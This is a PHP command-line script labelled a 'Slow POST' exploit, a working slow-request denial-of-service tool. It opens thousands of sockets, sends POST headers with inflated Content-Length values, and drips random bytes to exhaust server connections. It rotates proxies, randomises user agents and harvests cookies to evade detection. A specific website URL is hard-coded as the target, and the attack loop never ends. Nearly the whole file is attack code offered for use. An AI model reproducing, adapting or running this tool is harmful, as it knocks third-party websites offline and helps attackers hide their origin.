<?php
ignore_user_abort(true);
set_time_limit(0);
$_SERVER['argv'][1] = 'http://aeestesl.com/index.php?option=com_content&view=article&id=144&Itemid=70';
//-------------------------
// CONFiG
//-------------------------
$default_max_cookies = 100;
$default_max_sockets = 9001;
$default_msec_timeout = 500;
$default_usleep_time = 0;
//-------------------------
// INiT
//-------------------------
// Define EXPLOIT_VERSION
if( !defined('EXPLOIT_VERSION') )
define( 'EXPLOIT_VERSION', 'v1.6.2' );
// Define STDIN
if( !defined('STDIN') )
define( 'STDIN', fopen('php://stdin','r') );
// Check SAPI
if(PHP_SAPI != 'cli')
{
echo 'This script is not meant to be ran via browser.';
exit(1);
}
// Globals - DO NOT EDIT
$global_proxy_array = null;
//-------------------------
// FUNCTiONS FOR THE LULZ
//-------------------------
/** Read STDIN and return it */
function readSTDIN()
{
$file = STDIN;
if(!$file) return false;
$data = fgets($file);
return rtrim($data);
}
/** Receive a filename that has proxies listed in it and fills the $global_proxy_array */
function proxyLoadFile($filename)
{
global $global_proxy_array;
// Load proxy list file
$filename = str_replace('\\','/',$filename);
$global_proxy_array = @file_get_contents($filename);
if(!$filename || !$global_proxy_array)
{
echo $filename.' is not a valid proxy-list file!';
exit(1);
}
$global_proxy_array = str_replace( array("\r\n","\r"), "\n", $global_proxy_array);
$global_proxy_array = explode("\n",$global_proxy_array);
// Grab the proxies
foreach($global_proxy_array as $key => $value)
{
$global_proxy_array[$key] = explode(':',$value);
if( isset($global_proxy_array[$key][0], $global_proxy_array[$key][1]) )
{
// This allows me to get proxies from lists like
// IP:PORT bla bla bla
$global_proxy_array[$key][1] = explode(' ',$global_proxy_array[$key][1]);
$global_proxy_array[$key][1] = explode("\t",$global_proxy_array[$key][1][0]);
$global_proxy_array[$key][1] = $global_proxy_array[$key][1][0];
// The proxy
$global_proxy_array[$key] = array('host' => $global_proxy_array[$key][0], 'port' => $global_proxy_array[$key][1]);
}
else
{
unset($global_proxy_array[$key]);
}
}
}
/** Returns a random a proxy */
function proxyGetRandom()
{
global $global_proxy_array;
// Give a random proxy
$proxy = null;
if( count($global_proxy_array) )
{
while( !$proxy )
{
$rand = mt_rand(0,count($global_proxy_array)-1);
$proxy = (isset($global_proxy_array[$rand]) ? $global_proxy_array[$rand] : null);
}
return $proxy;
}
return false;
}
/** Returns a random useragent */
function randomUserAgent()
{
// Microsoft Windows versions
$os = array('5.0','5.1','5.2','6.0','6.1','6.2');
// Select a random windows
$os = $os [ mt_rand(0,count($os)-1) ];
// Select a random browser
if( mt_rand(0,1) )
{
// Internet Explorer versions
$ua[0] = array('4.0','7.0');
$ua[1] = array('4.0','8.0');
$ua[2] = array('5.0','9.0');
// Random IE
$ua = $ua [ mt_rand(0,count($ua)-1) ];
return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[0]})";
}
else
{
// Mozilla Firefox versions
$ua = array('18.0','19.0','20.0');
// Random FF
$ua = $ua [ mt_rand(0,count($ua)-1) ];
return "Mozilla/5.0 (Windows NT {$os}; rv:{$ua}) Gecko/20100101 Firefox/{$ua}";
}
}
/** Opens a custom socket and returns it */
function openCustomSocket($newEraUrl, $newEraProxy=null)
{
global $default_msec_timeout;
$newEraConnection = (($newEraProxy == null) ? $newEraUrl : $newEraProxy);
$host = (($newEraConnection->ssl) ? 'ssl://' : 'tcp://').$newEraConnection->name;
$fp = @fsockopen($host, $newEraConnection->port, $errno, $errstr, 1);
if (!$fp)
return false;
stream_set_blocking($fp,0);
stream_set_timeout($fp,0,$default_msec_timeout);
return $fp;
}
/**
* Receives a socket and performs the start of a slowPosting
* Returns Content-Length on success and false on failure
*/
function slowPostStart($sock, $newEraUrl, $newEraProxy, $cookie)
{
// Check the socket
if($sock)
{
// Generate a random Content-Length
$length = mt_rand(1337,31337);
// Init
if($newEraProxy == null)
$out = 'POST /'.$newEraUrl->path.' HTTP/1.1'."\r\n";
else
$out = 'POST '.$newEraUrl->full_url.' HTTP/1.1'."\r\n";
// Build
$out .= 'Host: '.$newEraUrl->name."\r\n";
$out .= 'Connection: Keep-Alive'."\r\n";
$out .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$out .= 'User-Agent: '.randomUserAgent()."\r\n";
$out .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$out .= 'Accept-Encoding: gzip,deflate'."\r\n";
$out .= 'Keep-Alive: '.mt_rand(60,120)."\r\n";
$out .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n";
$out .= mt_rand(0,1) ? 'Referer: '.($newEraUrl->ssl?'https://':'http://').$newEraUrl->name.'/'."\r\n" : '';
$out .= ($cookie ? "Cookie: {$cookie}\r\n" : '' );
$out .= 'Content-Length: '.$length."\r\n";
$out .= "\r\n";
// Do it
@fwrite($sock, $out);
return $length;
}
return false;
}
/** Receives a socket and continues the slowPosting */
function slowPostContinue($sock,$bytes=5)
{
global $default_usleep_time;
// Throttle execution speed slightly
if( $default_usleep_time > 0 )
@usleep($default_usleep_time);
// Check the $bytes
if( intval($bytes) != $bytes ) $bytes=5;
// Check the socket
if($sock)
{
// Do it :D
$out = '';
for($j=0;$j<$bytes;$j++);
{
$out .= chr(mt_rand(33,126));
}
$out = urlencode($out);
@fwrite($sock, $out);
return true;
}
else
return false;
}
//-------------------------
// CLASSES FOR THE LULZ
//-------------------------
/** I want cookies! Give me cookies! */
class NewEraCookies
{
private $max_cookies;
private $cookies = array();
/** Constructor */
public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile=null, $output=false)
{
$this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output);
}
/** Object updater */
public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile=null, $output=false)
{
$this->max_cookies = $max_cookies;
$this->cookies = array();
if($output)
echo PHP_EOL.'BUILDING COOKIES ';
for($i=0; $i<$this->max_cookies; $i++)
{
// Using Proxy file?
if( $proxyFile )
{
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxyFile.' is not a valid proxy-list file!');
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
$this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy);
if($output)
echo '.';
}
}
/** Returns a cookie by its index */
public function returnCookieByIndex($idx)
{
if($idx == 'random')
$idx = mt_rand(0, $this->max_cookies-1);
if(isset($this->cookies[$idx]))
return $this->cookies[$idx];
return '';
}
/** Function to parse set-cookie from header fields */
public static function cookieParse($header)
{
$cookies = array();
foreach($header as $line)
{
if(preg_match('/^Set-Cookie: /i', $line))
{
$line = preg_replace('/^Set-Cookie: /i', '', trim($line));
$csplit = explode(';', $line);
$cdata = array();
$has_grabbed_cookie_data = false;
foreach($csplit as $data)
{
$cinfo = explode('=', $data);
$cinfo[0] = trim($cinfo[0]);
if(!$has_grabbed_cookie_data)
{
$cdata['value']['key'] = $cinfo[0];
$cdata['value']['value'] = $cinfo[1];
$has_grabbed_cookie_data = true;
continue;
}
$cinfo[0] = strtolower($cinfo[0]);
if($cinfo[0] == 'expires') $cinfo[1] = strtotime($cinfo[1]);
if($cinfo[0] == 'secure') $cinfo[1] = 'true';
if(in_array($cinfo[0], array('domain', 'expires','path','secure','comment')))
{
$cdata[trim($cinfo[0])] = $cinfo[1];
}
}
$cookies[] = $cdata;
}
}
return $cookies;
}
/** Function to build the request cookie header from parsed set-cookie data */
public static function cookieBuild($data)
{
if(is_array($data))
{
$cookie = array();
foreach($data as $d)
$cookie[] = $d['value']['key'].'='.$d['value']['value'];
if(count($cookie) > 0)
return trim(implode('; ', $cookie));
}
return false;
}
/** Function to grab cookies from an url using PHP's fopen */
public static function cookieGrab($newEraUrl, $newEraProxy=null)
{
// Build connection headers
$headers = 'Connection: Keep-Alive'."\r\n";
$headers .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$headers .= 'User-Agent: '.randomUserAgent()."\r\n";
$headers .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$headers .= 'Accept-Encoding: gzip,deflate'."\r\n";
$headers .= 'Keep-Alive: '.mt_rand(60,120)."\r\n";
// Check proxy url
if($newEraProxy == null)
{
// Disable proxy
$proxy_url = '';
$request_fulluri = false;
}
else
{
// Enable proxy
$proxy_url = $newEraProxy->full_url;
$request_fulluri = true;
}
// Build stream context
$context = stream_context_create(array(
'http' => array(
'method' => 'GET',
'timeout' => (3),
'header' => $headers,
'proxy' => $proxy_url,
'request_fulluri' => $request_fulluri,
'max_redirects' => (0),
'protocol_version' => (1.1),
'ignore_errors' => true
),
'ssl' => array(
'verify_peer' => false
)
));
// Let the fun begin
$cookie = '';
$handle = @fopen($newEraUrl->full_url, 'r', false, $context);
// I hope this does work
if($handle)
{
// If it worked, we grab the cookies
$metadata = stream_get_meta_data($handle);
$cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data']));
// Fun is only at a small distance
@fclose($handle);
}
return $cookie;
}
}
/** Class to construct and handle an url-like object */
class NewEraUrl
{
private $host_full_url;
private $host_protocol;
private $host_ssl;
private $host_name;
private $host_port;
private $host_path;
/** Constructor */
public function __construct($host_full_url)
{
$this->update_object($host_full_url);
}
/** Object updater */
public function update_object($host_full_url)
{
$this->host_full_url = $host_full_url;
$this->host_ssl = ((strpos($this->host_full_url, 'https') === 0) ? true : false);
$this->host_protocol = ($this->host_ssl ? 'https' : 'http');
// Grab other parameters
$host_full_url = explode('/',$host_full_url,4);
$host_full_url[2] = explode(':',$host_full_url[2],2);
// Host, Port, Path
$this->host_name = $host_full_url[2][0];
$this->host_port = (isset($host_full_url[2][1]) ? $host_full_url[2][1] : ($this->host_ssl ? 443 : 80));
$this->host_path = (isset($host_full_url[3]) ? $host_full_url[3] : '');
}
/** Getter for the private properties */
public function __get($var)
{
$var = 'host_'.$var;
if(property_exists($this,$var))
return $this->{$var};
}
/** Quick check to see if url is minimally valid */
public static function isValid($host_full_url)
{
if(strpos($host_full_url,'https://') === 0 || strpos($host_full_url,'http://') === 0)
return true;
}
}
/** Class to construct and handle a proxy-like object */
class NewEraProxy
{
private $proxy_full_url;
private $proxy_protocol;
private $proxy_ssl;
private $proxy_name;
private $proxy_port;
/** Constructor */
public function __construct($proxy_full_url)
{
$this->update_object($proxy_full_url);
}
/** Object updater */
public function update_object($proxy_full_url)
{
$this->proxy_full_url = $proxy_full_url;
$this->proxy_ssl = ((strpos($this->proxy_full_url, 'ssl') === 0) ? true : false);
$this->proxy_protocol = ($this->proxy_ssl ? 'ssl' : 'tcp');
// Grab other parameters
if( false !== ($tmp = strpos($proxy_full_url,'://')) )
$proxy_full_url = substr($proxy_full_url, $tmp+3);
$proxy_full_url = explode(':',$proxy_full_url);
// Host, Port, Path
$this->proxy_name = $proxy_full_url[0];
$this->proxy_port = (int)(isset($proxy_full_url[1]) ? $proxy_full_url[1] : ($this->proxy_ssl ? '443' : '80'));
}
/** Getter for the private properties */
public function __get($var)
{
$var = 'proxy_'.$var;
if(property_exists($this,$var))
return $this->{$var};
}
}
//-------------------------
// MAiN CODE FOR THE LULZ
//-------------------------
echo "
_______. __ ______ ____ __ ____
/ || | / __ \ \ \ / \ / /
| (----`| | | | | | \ \/ \/ /
\ \ | | | | | | \ /
.----) | | `----.| `--' | \ /\ /
|_______/ |_______| \______/ \__/ \__/
.______ ______ _______.___________.
| _ \ / __ \ / | |
| |_) | | | | | | (----`---| |----`
| ___/ | | | | \ \ | |
| | | `--' | .----) | | |
| _| \______/ |_______/ |__|
";
echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL;
// Fetch the URL to attack
$url = null;
if( isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1]) )
$url = $_SERVER['argv'][1];
// Fetch proxy to use
$proxy['host'] = null;
$proxy['port'] = null;
$proxy['file'] = false;
if( !empty($url) && isset($_SERVER['argv'][2]) )
{
if( $proxy = explode(':',$_SERVER['argv'][2]) )
{
if( isset($proxy[0], $proxy[1]) )
{
$proxy['file'] = false;
$proxy['host'] = $proxy[0];
$proxy['port'] = $proxy[1];
unset($proxy[0], $proxy[1]);
}
}
if( !( isset($proxy['host']) && isset($proxy['port']) ) && is_readable($_SERVER['argv'][2]) )
{
$proxy['file'] = true;
$proxy['filename'] = $_SERVER['argv'][2];
}
}
// Ask for proxy
if( empty($url) && ( empty($proxy['host']) || empty($proxy['port']) ) && !$proxy['file'] )
{
$proxy['use'] = null;
while( !$proxy['use'] )
{
echo PHP_EOL.'Do you want to use a proxy [yes/no/file]: ';
$proxy['use'] = readSTDIN();
if( strpos(strtolower($proxy['use']),'y') === 0 )
{
echo PHP_EOL.'Proxy IP: ';
$proxy['host'] = readSTDIN();
echo PHP_EOL.'Proxy Port: ';
$proxy['port'] = readSTDIN();
}
elseif( strpos(strtolower($proxy['use']),'n') === 0 )
{
break;
}
elseif( strpos(strtolower($proxy['use']),'f') === 0 )
{
echo PHP_EOL.'Proxy file: ';
$proxy['filename'] = readSTDIN();
if( is_readable($proxy['filename']) )
{
$proxy['file'] = true;
}
else
{
echo PHP_EOL.'Invalid file!'.PHP_EOL;
$proxy['use'] = null;
}
}
else
{
$proxy['use'] = null;
echo PHP_EOL.'Invalid choice!'.PHP_EOL;
}
}
unset($proxy['use']);
}
// Ask for target URL
while( !$url )
{
echo PHP_EOL.'Target url: ';
$url = readSTDIN();
if( NewEraUrl::isValid($url) ) break;
$url = null;
echo PHP_EOL.'Invalid target!'.PHP_EOL;
}
// Init proxy suport
if( empty($proxy['host']) || empty($proxy['port']) )
{
$newEraProxy = null;
if( !empty($proxy['file']) )
{
proxyLoadFile($proxy['filename']);
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy = new NewEraProxy('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
}
else
{
$newEraProxy = new NewEraProxy('tcp://'.$proxy['host'].':'.$proxy['port']);
}
// Init the others
@ini_set('default_socket_timeout',1);
$newEraUrl = new NewEraUrl($url);
$newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $default_max_cookies, $proxy['file'], true);
// Do it
while(true)
{
$fp = array();
// Start
echo PHP_EOL.'IMMA FIRIN MAH LAZOR ';
for($i=0;$i<$default_max_sockets;$i++)
{
// Using Proxy file?
if( $proxy['file'] )
{
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
// Open a new socket (only try to open SSL sockets if not using proxies)
if( $fp[$i]['sock'] = openCustomSocket($newEraUrl, $newEraProxy) )
{
// Progress bar?
echo '+';
// Start a new slowPost
if( $_length = slowPostStart($fp[$i]['sock'], $newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random') ) )
{
// Find the lenght
if( !isset($fp[$i]['length']) )
{
$fp[$i]['length'] = $_length;
}
}
else
{
// Epic fail?
@fclose($fp[$i]['sock']);
unset($fp[$i]);
}
}
else
{
// Epic fail?
@fclose($fp[$i]['sock']);
unset($fp[$i]);
}
// Check the current sockets
foreach($fp as $_k => $_v)
{
if($fp[$_k]['length'] > 0)
{
// Contine old slowPosts
$_length = ($fp[$_k]['length'] < 5) ? $fp[$_k]['length'] : 5;
slowPostContinue($fp[$_k]['sock'],$_length);
$fp[$_k]['length'] = $fp[$_k]['length']-$_length;
}
else
{
// Close completed slowPosts
@fclose($fp[$_k]['sock']);
unset($fp[$_k]);
}
}
unset($_k,$_v);
}
// Restart
foreach($fp as $_k => $_v)
{
@fclose($fp[$_k]['sock']);
}
$newEraCookies->update_object($newEraUrl, $newEraProxy, $default_max_cookies, $proxy['file'], true);
}
?>
preferences:
31.83 ms | 402 KiB | 5 Q